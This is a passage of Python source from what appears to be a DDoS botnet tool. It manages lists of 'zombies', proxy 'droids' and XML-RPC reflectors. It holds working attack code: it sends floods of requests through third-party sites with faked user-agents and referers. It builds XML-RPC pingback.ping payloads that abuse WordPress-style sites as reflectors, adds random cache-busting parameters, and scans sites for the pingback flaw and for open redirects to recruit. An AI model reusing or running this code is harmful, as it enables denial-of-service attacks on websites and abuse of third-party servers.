target = urllib.parse.unquote(target).decode('utf8') # parte urlencoding
except:
target = urllib.parse.unquote(target)
if target.startswith('http://'): # remove http
target = target.replace('http://', '')
if target.startswith('https://'):
target = target.replace('https://', '') # remove https
options = self.options
shuffle(droids) # shuffle droids
if not self.options.disablepurge:
for droid in droids:
if not droid.startswith('http'): # discarded inmediately
self.discard_droids.append(droid)
self.num_discard_droids = self.num_discard_droids + 1
droids = self.discarding_droids(droid, droids) # check if droid is failing for autobalance army
if not self.options.disablepurge:
if not droids: # return when not any working
self.options.disabledroids = True
return
shuffle(droids) # shuffle droids order, each discarding check :-)
for droid in droids:
name_droid = None
if "$TARGET" in droid: # replace droid/parameter for target
url = droid.replace("$TARGET", target)
t = urlparse(url)
name_droid = t.netloc
if name_droid == "":
name_droid = droid
print("[Info] [Droids] Attacking from: " + name_droid)
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Content-type' : "application/x-www-form-urlencoded", 'Referer' : self.referer, 'Connection' : 'keep-alive'} # set fake headers
try:
if options.proxy: # set proxy
self.proxy_transport(options.proxy)
if self.options.timeout: # set timeout
try:
droid_timeout = int(self.options.timeout)
except:
droid_timeout = 5
else:
droid_timeout = 5
if droid_timeout < 1:
droid_timeout = 5
req = urllib.request.Request(url, None, headers)
rsp = urllib.request.urlopen(req, context=self.ctx, timeout=droid_timeout)
self.droids_hit = self.droids_hit + 1 # add hit to droids stats
except Exception:
print("[Info] [Droids] " + name_droid + " -> FAILED (cannot connect!)")
self.droids_fail = self.droids_fail + 1 # add fail to droids stats
if not self.options.disablepurge:
self.discard_droids.append(droid)
self.num_discard_droids = self.num_discard_droids + 1
else:
print("[Info] [Droids] " + str(droid) + " -> FAILED (invalid droid!)")
self.droids_fail = self.droids_fail + 1 # add fail to droids stats
if not self.options.disablepurge:
self.discard_droids.append(droid)
self.num_discard_droids = self.num_discard_droids + 1
if self.options.verbose:
if name_droid:
print("[Info] [AI] [Droids] "+str(name_droid)+" is returning...")
else:
print("[Info] [AI] [Droids] "+str(droid)+" is returning...")
if self.options.disablerpcs and self.options.disableucavs:
self.extra_zombies_lock = False # [ARMY] have finished
def extract_droids(self):
# extract droids from file
options = self.options
try:
f = open(self.droids_file)
droids = f.readlines()
droids = [ droid.replace('\n','') for droid in droids ]
f.close()
if not droids:
print("[Info] [AI] [Control] Cannot retrieve [Droids] from: 'botnet/droids.txt' -> [Discarding!]")
self.options.disabledroids = True
return
else:
return droids
except:
if os.path.exists(self.droids_file) == True:
print("[Info] [AI] [Control] Cannot open [Droids] from: 'botnet/droids.txt' -> [Discarding!]")
return #sys.exit(2)
else:
print("[Info] [AI] [Control] Cannot found [Droids] from: 'botnet/droids.txt' -> [Discarding!]")
return #sys.exit(2)
def discarding_rpcs(self, rpc, rpcs):
if rpc in self.discard_rpcs:
rpcs.remove(rpc)
if self.options.verbose:
print(("[Info] [AI] [Control] [X-RPCs] "+str(rpc)+" is not working! -> [Discarding!]"))
return rpcs
def send_rpcs(self, rpcs):
# extract vulnerable XML-RPC pingback services and perform requests against target
time.sleep(4) # aiming (multi-threading flow time compensation)
if not self.options.disablepurge:
if not rpcs: # return when not any working
self.options.disablerpcs = True
return
target = self.options.target
options = self.options
def random_key(length):
key = ''
for i in range(length):
key += random.choice(string.ascii_lowercase + string.ascii_uppercase + string.digits)
return key
shuffle(rpcs) # shuffle rpcs
if not self.options.disablepurge:
for rpc in rpcs:
if not rpc.startswith('http'): # discarded inmediately
if not self.options.disablepurge:
self.discard_rpcs.append(rpc)
self.num_discard_rpcs = self.num_discard_rpcs + 1
self.rpcs_fail = self.rpcs_fail + 1 # add rpc fail to stats
rpcs = self.discarding_rpcs(rpc, rpcs) # check if rpc is failing for autobalance army
if not self.options.disablepurge:
if not rpcs: # return when not any working
self.options.disablerpcs = True
return
shuffle(rpcs) # shuffle rpcs order, each discarding check :-)
for rpc in rpcs:
t = urlparse(rpc)
name_rpc = t.netloc
if name_rpc == "":
name_rpc = rpc
print("[Info] [X-RPCs] Attacking from: " + name_rpc)
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
key = random_key(8) # generate random value page to bypass cache
rpc_page = "?" + str(key)
key = random_key(6) # re-generate random value id to bypass cache
rpc_id = "=" + str(key)
target_place = target + rpc_page + rpc_id # random place to bypass cache (ex: www.target.com?U7OvBdp1=4lMcNj)
if "/xmlrpc.php" in rpc:
rpc_place = rpc.replace("xmlrpc.php", "")
rpc_exploit = "<methodCall><methodName>pingback.ping</methodName><params><param><value><string>"+target_place+"</string></value></param><param><value><string>"+rpc_place+"</string></value></param></params></methodCall>"
try:
if options.proxy: # set proxy
self.proxy_transport(options.proxy)
if self.options.timeout: # set timeout
try:
rpc_timeout = int(self.options.timeout)
except:
rpc_timeout = 5
else:
rpc_timeout = 5
if rpc_timeout < 1:
rpc_timeout = 5
req = urllib.request.Request(rpc, rpc_exploit.encode('utf-8'), headers)
urllib.request.urlopen(req, context=self.ctx, timeout=rpc_timeout)
self.rpcs_hit = self.rpcs_hit + 1 # add rpc hit to stats
if self.options.verbose:
print("[Info] [X-RPCs] Reply:", target_reply)
except:
print("[Info] [X-RPCs] " + name_rpc + " -> FAILED (cannot connect!)")
self.rpcs_fail = self.rpcs_fail + 1 # add rpc fail to stats
if not self.options.disablepurge:
self.discard_rpcs.append(rpc)
self.num_discard_rpcs = self.num_discard_rpcs + 1
else:
print("[Info] [X-RPCs] " + name_rpc + " -> FAILED (invalid X-RPC!)")
self.rpcs_fail = self.rpcs_fail + 1 # add rpc fail to stats
if not self.options.disablepurge:
self.discard_rpcs.append(rpc)
self.num_discard_rpcs = self.num_discard_rpcs + 1
if self.options.verbose:
print("[Info] [AI] [X-RPCs] "+str(name_rpc)+" is returning...")
if self.options.disableucavs:
self.extra_zombies_lock = False # [ARMY] have finished
def extract_rpcs(self):
# extract rpcs from file
options = self.options
try:
f = open(self.rpcs_file)
rpcs = f.readlines()
rpcs = [ rpc.replace('\r','') for rpc in rpcs ]
rpcs = [ rpc.replace('\n','') for rpc in rpcs ]
f.close()
if not rpcs:
print("[Info] [AI] [Control] Cannot retrieve [X-RPCs] from: 'botnet/rpcs.txt' -> [Discarding!]")
self.options.disablerpcs = True
return
else:
return rpcs
except:
if os.path.exists(self.rpcs_file) == True:
print("[Info] [AI] [Control] Cannot open [X-RPCs] from: 'botnet/rpcs.txt' -> [Discarding!]")
return
else:
print("[Info] [AI] [Control] Cannot found [X-RPCs] from: 'botnet/rpcs.txt' [Discarding!]")
return
def extract_ntps(self):
# extract ntps from file
options = self.options
try:
f = open(self.ntps_file)
ntps = f.readlines()
ntps = [ ntp.replace('\r','') for ntp in ntps ]
ntps = [ ntp.replace('\n','') for ntp in ntps ]
f.close()
if not ntps:
print("[Info] [AI] [Control] Cannot retrieve [NTPs] from: 'botnet/ntp.txt' -> [Discarding!]")
return
else:
return ntps
except:
if os.path.exists(self.ntps_file) == True:
print("[Info] [AI] [Control] Cannot open [NTPs] from: 'botnet/ntp.txt' -> [Discarding!]")
return
else:
print("[Info] [AI] [Control] Cannot found [NTPs] from: 'botnet/ntp.txt' [Discarding!]")
return
def extract_dnss(self):
# extract dnss from file
options = self.options
try:
f = open(self.dnss_file)
dnss = f.readlines()
dnss = [ dns.replace('\r','') for dns in dnss ]
dnss = [ dns.replace('\n','') for dns in dnss ]
f.close()
if not dnss:
print("[Info] [AI] [Control] Cannot retrieve [DNSs] from: 'botnet/dns.txt' -> [Discarding!]")
return
else:
return dnss
except:
if os.path.exists(self.dnss_file) == True:
print("[Info] [AI] [Control] Cannot open [DNSs] from: 'botnet/dns.txt' -> [Discarding!]")
return
else:
print("[Info] [AI] [Control] Cannot found [DNSs] from: 'botnet/dns.txt' [Discarding!]")
return
def extract_snmps(self):
# extract snmps from file
options = self.options
try:
f = open(self.snmps_file)
snmps = f.readlines()
snmps = [ snmp.replace('\r','') for snmp in snmps ]
snmps = [ snmp.replace('\n','') for snmp in snmps ]
f.close()
if not snmps:
print("[Info] [AI] [Control] Cannot retrieve [SNMPs] from: 'botnet/snmp.txt' -> [Discarding!]")
return
else:
return snmps
except:
if os.path.exists(self.snmps_file) == True:
print("[Info] [AI] [Control] Cannot open [SNMPs] from: 'botnet/snmp.txt' -> [Discarding!]")
return
else:
print("[Info] [AI] [Control] Cannot found [SNMPs] from: 'botnet/snmp.txt' [Discarding!]")
return
def extract_zombies(self):
options = self.options
if self.options.test:
try:
f = open(options.test)
zombies = f.readlines()
zombies = [ zombie.replace('\n','') for zombie in zombies ]
f.close()
if not zombies:
print("\n[Error] [AI] [Control] Cannot retrieve [Zombies] from: 'botnet/zombies.txt' -> [Aborting!]\n")
return
else:
return zombies
except:
if os.path.exists(options.test) == True:
print("\n[Error [AI] [Control] Cannot open [Zombies] from: 'botnet/zombies.txt' -> [Aborting!]\n")
return #sys.exit(2)
else:
print("\n[Error] [AI] [Control] Cannot found [Zombies] from: 'botnet/zombies.txt' -> [Aborting!]\n")
return #sys.exit(2)
else:
try:
f = open(self.zombies_file)
zombies = f.readlines()
zombies = [ zombie.replace('\n','') for zombie in zombies ]
f.close()
if not zombies:
print("\n[Error] [AI] You haven't [Zombies] to be extracted from: 'botnet/zombies.txt' -> [Aborting!]\n")
return
else:
return zombies
except:
if os.path.exists(self.zombies_file) == True:
print("\n[Error] [AI] [Control] Cannot open [Zombies] from: 'botnet/zombies.txt' -> [Aborting!]\n")
return #sys.exit(2)
else:
print("\n[Error] [AI] [Control] Cannot found [Zombies] from: 'botnet/zombies.txt' -> [Aborting!]\n")
return #sys.exit(2)
def extract_target_list(self):
options = self.options
try:
f = open(options.target_list)
targets = f.readlines()
targets = [ target.replace('\n','') for target in targets ]
f.close()
if not targets:
print("\n[Error] [AI] [Control] Cannot retrieve [Targets] from: '"+options.target_list+"' -> [Aborting!]\n")
return
else:
return targets
except:
if os.path.exists(options.target_list) == True:
print("\n[Error] [AI] [Control] Cannot found [Targets] from: '"+options.target_list+"' -> [Aborting!]\n")
return #sys.exit(2)
else:
print("\n[Error] [AI] [Control] Cannot open [Targets] from: '"+options.target_list+"' -> [Aborting!]\n")
return #sys.exit(2)
def update_zombies(self, zombies_ready):
# update zombies on file
options = self.options
if options.attackme:
f = open(self.zombies_file, "w") # re-write list
for zombie in self.doll.real_zombies: # add only alien verified zombies
for x in zombie:
f.write(str(x) + os.linesep)
f.close()
if options.test or options.testall:
if not options.test:
options.test = self.zombies_file
f = open(options.test, "w") # re-write list only with zombies ready
for zombie in zombies_ready:
f.write(zombie + os.linesep)
f.close()
if options.search or options.dorks or options.autosearch or options.download or options.download_github: # append only new zombies to list (dorking supported)
f = open(self.zombies_file)
zombies_on_file = f.read().splitlines()
with open(self.zombies_file, "a") as zombie_list:
for zombie in zombies_ready:
if zombie not in zombies_on_file: # parse possible repetitions
zombie_list.write(zombie + os.linesep)
if options.download or options.download_github:
self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole)
else:
self.scanned_zombies = self.scanned_zombies + 1 # update scanner stats only with new zombies (dorking)
f.close()
def update_aliens(self, aliens_ready):
# update aliens on file
options = self.options
if options.download or options.download_github: # append only new aliens to list
f = open(self.aliens_file)
aliens_on_file = f.read().splitlines()
with open(self.aliens_file, "a") as alien_list:
for alien in aliens_ready:
if alien not in aliens_on_file: # parse possible repetitions
alien_list.write(alien + os.linesep)
self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole)
f.close()
def update_droids(self, droids_ready):
# update droids on file
options = self.options
if options.download or options.download_github: # append only new droids to list
f = open(self.droids_file)
droids_on_file = f.read().splitlines()
with open(self.droids_file, "a") as droid_list:
for droid in droids_ready:
if droid not in droids_on_file: # parse possible repetitions
droid_list.write(droid + os.linesep)
self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole)
f.close()
def update_ucavs(self, ucavs_ready):
# update ucavs on file
options = self.options
if options.download or options.download_github: # append only new ucavs to list
f = open(self.ucavs_file)
ucavs_on_file = f.read().splitlines()
with open(self.ucavs_file, "a") as ucav_list:
for ucav in ucavs_ready:
if ucav not in ucavs_on_file: # parse possible repetitions
ucav_list.write(ucav + os.linesep)
self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole)
f.close()
def update_rpcs(self, rpcs_ready):
# update rpcs on file
options = self.options
if options.testrpc or options.testall:
f = open(self.rpcs_file, "w") # re-write list
for rpc in rpcs_ready: # add only rpc verified zombies
f.write(rpc + os.linesep)
f.close()
if options.download or options.download_github: # append only new rpcs to list
f = open(self.rpcs_file)
rpcs_on_file = f.read().splitlines()
with open(self.rpcs_file, "a") as rpc_list:
for rpc in rpcs_ready:
if rpc not in rpcs_on_file: # parse possible repetitions
rpc_list.write(rpc + os.linesep)
self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole)
f.close()
def update_dnss(self, dnss_ready):
# update dns on file
options = self.options
if options.download or options.download_github: # append only new dns to list
f = open(self.dnss_file)
dnss_on_file = f.read().splitlines()
with open(self.dnss_file, "a") as dns_list:
for dns in dnss_ready:
if dns not in dnss_on_file: # parse possible repetitions
dns_list.write(dns + os.linesep)
self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole)
f.close()
def update_ntps(self, ntps_ready):
# update ntps on file
options = self.options
if options.download or options.download_github: # append only new ntps to list
f = open(self.ntps_file)
ntps_on_file = f.read().splitlines()
with open(self.ntps_file, "a") as ntp_list:
for ntp in ntps_ready:
if ntp not in ntps_on_file: # parse possible repetitions
ntp_list.write(ntp + os.linesep)
self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole)
f.close()
def update_snmps(self, snmps_ready):
# update snmps on file
options = self.options
if options.download or options.download_github: # append only new snmps to list
f = open(self.snmps_file)
snmps_on_file = f.read().splitlines()
with open(self.snmps_file, "a") as snmp_list:
for snmp in snmps_ready:
if snmp not in snmps_on_file: # parse possible repetitions
snmp_list.write(snmp + os.linesep)
self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole)
f.close()
def search_rpc(self, rpc_host):
options = self.options
rpc_vulnerable = False
rpc_pingback_url = False
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
try:
if self.options.testall: # testing_all
if options.proxy: # set proxy
self.proxy_transport(options.proxy)
req = urllib.request.Request(rpc_host, None, headers)
rpc_code = urllib.request.urlopen(req, context=self.ctx).read().decode('utf-8')
rpc_links = re.findall('"((http|ftp)s?://.*?)"', rpc_code)
for link in rpc_links:
if 'xmlrpc.php' in link[0] and not "rsd" in link[0]: # extract rpc server url (discarding 'rsd' url)
rpc_pingback_url = link[0]
rpc_vulnerable = True
break # found it!
else: # not any XML-RPC discovering methods are working
rpc_pingback_url = rpc_host + "/xmlrpc.php"
rpc_vulnerable = False
else:
if rpc_host.startswith("http://"):
rpc_host = rpc_host.replace("http://", "")
if rpc_host.startswith("https://"):
rpc_host = rpc_host.replace("https://", "")
rpc_host = urlparse(rpc_host)
rpc_path = rpc_host.path.replace("\r", "")
self.head = True # send HTTP HEAD request searching for: X-Pingback
reply = self.connect_zombie(rpc_path)
self.head = False
if "X-Pingback" in reply: # discovering pingback-enabled resources
m = re.search('X-Pingback: (.+?)\n', reply) # regex magics
rpc_pingback_url = m.group(1) # extract rpc server url
rpc_vulnerable = True
else: # not X-Pingback on HTTP Headers (search for <link rel="pingback"... on HTML/XHTML code)
if options.proxy: # set proxy
self.proxy_transport(options.proxy)
req_rpc = urllib.request.Request(rpc_host, None, headers)
req_rpc.get_method = lambda : 'GET'
rpc_code = urllib.request.urlopen(req_rpc, context=self.ctx).read().decode('utf-8')
rpc_links = re.findall('"((http|ftp)s?://.*?)"', rpc_code)
for link in rpc_links:
if 'xmlrpc.php' in link[0] and not "rsd" in link[0]: # extract rpc server url (discarding 'rsd' url)
rpc_pingback_url = link[0]
rpc_vulnerable = True
break # found it!
else: # not any XML-RPC discovering methods are working
rpc_pingback_url = rpc_host + "/xmlrpc.php"
rpc_vulnerable = False
except: # something wrong discovering XML-RPC Pingback
pass
return rpc_vulnerable, rpc_pingback_url
def testing_offline(self):
# check for zombies offline
print ("\n[Info] [AI] Checking (sending HTTP HEAD requests) for [Zombies] offline...\n")
print('='*35)
zombies_online = 0
zombies_offline = 0
zombies = self.extract_zombies()
rpcs = self.extract_rpcs()
aliens = self.extract_aliens()
droids = self.extract_droids()
ucavs = self.extract_ucavs()
try:
botnet = zombies + rpcs + aliens + droids + ucavs
except:
return
discarded = [] # for discarded zombies
if not botnet:
return
self.head = True
for zombie in botnet:
zombie = str(zombie)
if zombie in zombies: # set zombie type (this way because cannot be same zombie with different type)
zombie_type = 'Zombie'
elif zombie in rpcs:
zombie_type = 'XML-RPC'
elif zombie in aliens:
zombie_type = 'Alien'
elif zombie in droids:
zombie_type = 'Droid'
elif zombie in ucavs:
zombie_type = 'UCAV'
t = urlparse(zombie)
name_zombie = t.netloc
if name_zombie == "":
name_zombie = zombie
if zombie_type == 'Alien': # [Aliens] are made with keyword ;$POST;
sep = ';$POST;'
zombie = zombie.split(sep, 1)[0]
try:
reply = str(self.connect_zombie(zombie))
except:
reply = None
if reply:
if reply == "200" or reply == "301" or reply == "302":
status = "ONLINE! -> [OK!]"
else:
status = "ONLINE! -> [BUT replying an INVALID HTTP CODE]"
zombies_online = zombies_online + 1
else:
status = "NOT Working!"
zombies_offline = zombies_offline + 1
print("\nName:", name_zombie)
print("Type: [", zombie_type, "]")
print("Vector:", zombie)
print("HTTP Code: [", reply, "]")
print("STATUS:", status)
print('-'*21)
if status == "NOT Working!": # add to discarded zombies
if zombie not in discarded:
discarded.append(zombie)
print("\n" + '='*52)
print("\n+ Total Botnet:", len(botnet))
print("\n" + '-'*25 + "\n")
print(" - ONLINE:", zombies_online)
print(" - OFFLINE:", zombies_offline, "\n")
print('='*52 + '\n')
self.head = False
if zombies_offline > 0:
if not self.options.forceyes:
test_reply = input("[AI] Do you want to update your army? (Y/n)\n")
print('-'*25 + "\n")
else:
test_reply = "Y"
if test_reply == "n" or test_reply == "N":
print("[AI] "+self.exit_msg+"\n")
return
else:
disc_zombies = self.discard_zombies(discarded) # discard zombies (remove from files)
print('='*52)
print("\n - DISCARDED:", disc_zombies)
new_botnet = int(len(botnet) - disc_zombies)
print("\n+ New Total Botnet:", str(new_botnet), "\n")
print('='*52 + '\n')
else:
print("[Info] [AI] [Control] ALL checked [Zombies] are ONLINE! -> [Exiting!]\n")
def send_extra_zombies(self):
# check for extra zombies: aliens, droids, rpcs, ucavs... and start attacking with them
if not self.options.disablealiens and not self.options.attackme: # different layers requests -> pure web abuse
if self.options.verbose:
print("[Info] [AI] [Control] Deploying [Aliens] with heavy 'laser-cannon' weapons...")
aliens = [self.extract_aliens()] # extract aliens from file to a list
for a in aliens:
if a is None:
self.options.disablealiens = True
self.total_aliens = 0 # not any alien invoked
else:
for s in a: # extract number of aliens
self.total_aliens = self.total_aliens + 1
al = threading.Thread(target=self.send_aliens, args=(aliens)) # multithreading to send aliens
al.start()
else:
self.options.disablealiens = True
self.total_aliens = 0 # not any alien invoked
if not self.options.disabledroids and not self.options.attackme: # GET (with parameter required) requests
if self.options.verbose:
print("[Info] [AI] [Control] Deploying [Droids] with light 'laser-cannon' weapons...")
droids = [self.extract_droids()] # extract droids from file to a list
for d in droids:
if d is None:
self.options.disabledroids = True
self.total_droids = 0 # not any droid invoked
else:
for s in d: # extract number of droids
self.total_droids = self.total_droids + 1
dr = threading.Thread(target=self.send_droids, args=(droids)) # multithreading to send droids
dr.start()
else:
self.options.disabledroids = True
self.total_droids = 0 # not any droid invoked
if not self.options.disablerpcs and not self.options.attackme: # exploit XML-RPC pingback vulnerability
if self.options.verbose:
print("[Info] [AI] [Control] Deploying [X-RPCs] with 'plasma cannon' weapons...")
rpcs = [self.extract_rpcs()] # extract rpcs from file to a list
for r in rpcs:
if r is None:
self.options.disablerpcs = True
self.total_rpcs = 0 # not any rpc invoked
else:
for s in r: # extract number of rpcs
self.total_rpcs = self.total_rpcs + 1
rp = threading.Thread(target=self.send_rpcs, args=(rpcs)) # multithreading to send rpcs
rp.start()
else:
self.options.disablerpcs = True
self.total_rpcs = 0 # not any rpcs invoked
if not self.options.disableucavs and not self.options.attackme: # perform an external 'Is target up?' round check
if self.options.verbose:
print("[Info] [AI] [Control] Deploying [UCAVs] with 'heat-beam' weapons and 'status check' scanners...")
ucavs = [self.extract_ucavs()] # extract ucavs from file to a list
for u in ucavs:
if u is None:
self.options.disableucavs = True
self.total_ucavs = 0 # not any ucav invoked
else:
for s in u: # extract number of ucavs
self.total_ucavs = self.total_ucavs + 1
uc = threading.Thread(target=self.send_ucavs, args=(ucavs)) # multithreading to send ucavs
uc.start()
else:
self.options.disableucavs = True
self.total_ucavs = 0 # not any ucavs invoked
def abandoning_zombies(self):
if self.options.expire: # set timing for purge
try:
timing = int(self.options.expire)
except:
timing = self.expire_timing # default timing for purge
else:
timing = self.expire_timing # default timing for purge
if timing < 1:
timing = self.expire_timing # default timing for purge
zombies_arrival_timing = timing # timing = trying to control round time for threading flow
zombies_lock = 0
if self.options.verbose:
print("[Info] [AI] [Control] Setting ["+str(zombies_arrival_timing)+"] per round for [Zombies] to return...")
while self.herd.no_more_zombies() == False: # abandoning -controller- zombies
zombies_lock = zombies_lock + 1
if zombies_lock > zombies_arrival_timing: # execute main abandoning routine!
if self.options.verbose:
print("\n[Info] [AI] [Control] Return time set [~"+str(zombies_arrival_timing)+"] for [Zombies] is over! -> [Expiring!]")
break
else:
time.sleep(1)
def discard_zombies(self, discarded):
disc_zombies = 0
if self.options.testoffline:
zombies_list = [self.zombies_file, self.aliens_file, self.droids_file, self.ucavs_file, self.rpcs_file]
else:
zombies_list = [self.zombies_file]
if not self.options.disablealiens: # add aliens
zombies_list.append(self.aliens_file)
if not self.options.disabledroids: # add droids
zombies_list.append(self.droids_file)
if not self.options.disablerpcs: # add rpcs
zombies_list.append(self.rpcs_file)
if not self.options.disableucavs: # add ucavs
zombies_list.append(self.ucavs_file)
for l in zombies_list:
f = open(l, "r+")
d = f.readlines()
f.close()
f = open(l, "w")
disc_zombies = self.remove_discarded_zombies(f, d, discarded, disc_zombies)
f.close()
return disc_zombies
def remove_discarded_zombies(self, f, d, discarded, disc_zombies):
m = []
for zombie in d:
if zombie not in discarded == True:
m.append(zombie) # save it
else:
disc_zombies = disc_zombies + 1
if not m:
f.write("")
else:
for z in m:
f.write(z+os.linesep)
return disc_zombies
def parse_url_encoding(self, target):
t = urlparse(target)
host = urllib.parse.quote(t.netloc.encode('utf-8'))
path = urllib.parse.quote(t.path.encode('utf-8'))
query = urllib.parse.quote(t.query.encode('utf-8'))
if query:
if path.endswith(""):
path.replace("", "/")
query = urllib.parse.quote(t.query.encode('utf-8'))
target = t.scheme+"://"+host + path + "?" + query
else:
target = t.scheme+"://"+host + path
return target
def testing_rpcs(self, rpcs):
# discover/test XML-RPC Pingback vulnerabilities on webapps (Wordpress, Drupal, PostNuke, b2evolution,
# Xoops, PHPGroupWare, TikiWiki, etc...) and update list
options = self.options
if self.options.testall: #testing_all
print('='*51)
print ("Are 'plasma' reflectors ready? :-) (XML-RPC 'Pingback' Vulnerability Check):")
print('='*51)
num_active_rpcs = 0
num_failed_rpcs = 0
rpcs_ready = []
print("Trying:", len(rpcs))
print('-'*21)
for rpc in rpcs:
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
if rpc.startswith("http://") or rpc.startswith("https://"):
print("[Info] [X-RPCs] Exploiting 'X-Pingback' at:", rpc)
rpc_host = rpc.replace("/xmlrpc.php", "")
rpc_vulnerable, rpc_pingback_url = self.search_rpc(rpc_host)
if rpc_vulnerable == True: # discover XML-RPC system.listMethods allowed
rpc_methods = "<methodCall><methodName>system.listMethods</methodName><params></params></methodCall>"
try:
if options.proxy: # set proxy
self.proxy_transport(options.proxy)
try:
req = urllib.request.Request(rpc_pingback_url, rpc_methods.encode('utf-8'), headers)
target_reply = urllib.request.urlopen(req, context=self.ctx).read().decode('utf-8')
except:
if DEBUG == True:
traceback.print_exc()
if self.options.verbose:
print("[Info] [X-RPCs] Reply:", target_reply)
if "pingback.ping" in target_reply: # XML-RPC pingback.ping method is allowed!
print("[Info] [AI] -> [VULNERABLE!]")
rpcs_ready.append(rpc_pingback_url) # save XML-RPC path as RPC zombie
num_active_rpcs = num_active_rpcs + 1 # add success to rpcs stats
else:
print("[Info] [AI] -> [NOT vulnerable...]")
num_failed_rpcs = num_failed_rpcs + 1 # add fail to rpcs stats
except:
print("[Info] [AI] -> [NOT vulnerable...]")
num_failed_rpcs = num_failed_rpcs + 1 # add fail to rpcs stats
else:
print("[Info] [AI] -> [NOT vulnerable...]")
num_failed_rpcs = num_failed_rpcs + 1 # add fail to rpcs stats
print('-'*21)
print('='*18)
print("OK:", num_active_rpcs, "Fail:", num_failed_rpcs)
print('='*18)
if self.options.testall: # testing_all
return rpcs_ready, num_active_rpcs, num_failed_rpcs
else:
# update 'rpcs' list
if num_active_rpcs == 0:
print("\n[Info] [X-RPCs] Not any vulnerable 'XML-RPC' active!\n")
return
else:
if not self.options.forceyes:
update_reply = input("[AI] Do you want to update your army? (Y/n)")
print('-'*25)
else:
update_reply = "Y"
if update_reply == "n" or update_reply == "N":
print("[AI] "+self.exit_msg+"\n")
return
else:
self.update_rpcs(rpcs_ready)
if not self.options.upload:
print("\n[Info] [AI] Botnet updated! -> ;-)\n")
def testing(self, zombies):
# test Open Redirect exploiting and show statistics
# HTTP HEAD check
army = 0
print ("Are 'they' alive? :-) (HEAD Check):")
print('='*35)
num_active_zombies = 0
num_failed_zombies = 0
active_zombies = []
print("Trying:", len(zombies))
print('-'*21)
for zombie in zombies:
zombie = str(zombie)
if zombie.startswith("http://") or zombie.startswith("https://"):
# send HEAD connection
self.head = True
try:
self.connect_zombies(zombie)
except:
pass
while self.herd.no_more_zombies() == False:
time.sleep(1)
for zombie in self.herd.done:
zombie = str(zombie)
t = urlparse(zombie)
if self.herd.get_result(zombie):
code_reply = self.herd.get_result(zombie)
self.head = False
if code_reply == "200" or code_reply == "302" or code_reply == "301": # HEAD check pass!
name_zombie = t.netloc
if name_zombie == "":
name_zombie = zombie
print("Zombie:", name_zombie)
print("Status: OK ["+ code_reply + "]")
num_active_zombies = num_active_zombies + 1
active_zombies.append(zombie)
elif code_reply == "401":
print("Zombie:", t.netloc)
print("Status: Unauthorized ["+ code_reply + "]")
num_failed_zombies = num_failed_zombies + 1
elif code_reply == "403":
print("Zombie:", t.netloc)
print("Status: Error Forbidden ["+ code_reply + "]")
num_failed_zombies = num_failed_zombies + 1
elif code_reply == "404":
print("Zombie:", t.netloc)
print("Status: Not Found ["+ code_reply + "]")
num_failed_zombies = num_failed_zombies + 1
elif code_reply == "500":
print("Zombie:", t.netloc)
print("Status: Internal Server Error ["+ code_reply + "]")
num_failed_zombies = num_failed_zombies + 1
else:
print("Zombie:", t.netloc, "\nVector:", zombie)
print("Status: Not Allowed ["+ code_reply + "]")
num_failed_zombies = num_failed_zombies + 1
else:
if self.options.verbose:
print("[Info] [Zombies] Reply:", "\n\nNothing!!!!!\n")
print("Zombie:", zombie)
print("Status: Malformed!")
num_failed_zombies = num_failed_zombies + 1
print('-'*10)
self.herd.reset()
print('='*18)
print("OK:", num_active_zombies, "Fail:", num_failed_zombies)
print('='*18 + "\n")
print('='*22)
if num_active_zombies > 0:
# check url parameter vectors
print ("Checking for payloads:")
print('='*22)
print("Trying:", num_active_zombies)
print('-'*21)
zombies_ready = []
num_waiting_zombies = 0
if num_active_zombies == 0:
num_disconnected_zombies = num_failed_zombies
else:
num_disconnected_zombies = 0
for zombie in active_zombies:
zombie = str(zombie)
t = urlparse(zombie)
name_zombie = t.netloc
if name_zombie == "":
name_zombie = zombie
self.payload = True
try:
self.connect_zombies(zombie)
except:
pass
self.payload = False
while self.herd.no_more_zombies() == False:
time.sleep(1)
for zombie in self.herd.done:
zombie = str(zombie)
t = urlparse(zombie)
name_zombie = t.netloc
if name_zombie == "":
name_zombie = zombie
payload_zombie = zombie
payload_reply = ""
print("Vector:", payload_zombie)
self.payload = True
if self.herd.get_result(zombie):
payload_reply = self.herd.get_result(zombie)
self.payload = False
if "https://www.whitehouse.gov" in payload_reply: #Open Redirect reply [requested by all UFONet motherships ;-)]
num_waiting_zombies = num_waiting_zombies + 1
print("Status:", "Waiting for orders... ;-)")
zombies_ready.append(zombie)
else:
num_disconnected_zombies = num_disconnected_zombies + 1
print("Status:", "Not ready...")
army = army + 1
print('-'*10)
self.herd.reset()
print('='*18)
print("OK:", num_waiting_zombies, "Fail:", num_disconnected_zombies)
print('='*18 + "\n")
# list of [Zombies] ready to attack
num_active_zombie = 0
for z in zombies_ready:
t = urlparse(z)
name_zombie = t.netloc
if name_zombie == "":
name_zombie = z
num_active_zombie = num_active_zombie + 1
if self.options.verbose:
print("Zombie [", num_active_zombie, "]:", name_zombie + "\n")
if self.options.testall: # testing_all
return zombies_ready, num_waiting_zombies, num_disconnected_zombies + num_failed_zombies
else:
print('-'*25 + "\n")
print('='*24)
print("Working [Zombies]:", num_active_zombie)
print('='*24)
if not self.options.forceyes:
update_reply = input("\n[AI] Do you want to update your army? (Y/n)")
print('-'*25)
else:
update_reply = "Y"
if update_reply == "n" or update_reply == "N":
print("[AI] "+self.exit_msg+"\n")
return
else:
self.update_zombies(zombies_ready)
if not self.options.upload:
print("\n[Info] [AI] Botnet updated! -> ;-)\n")
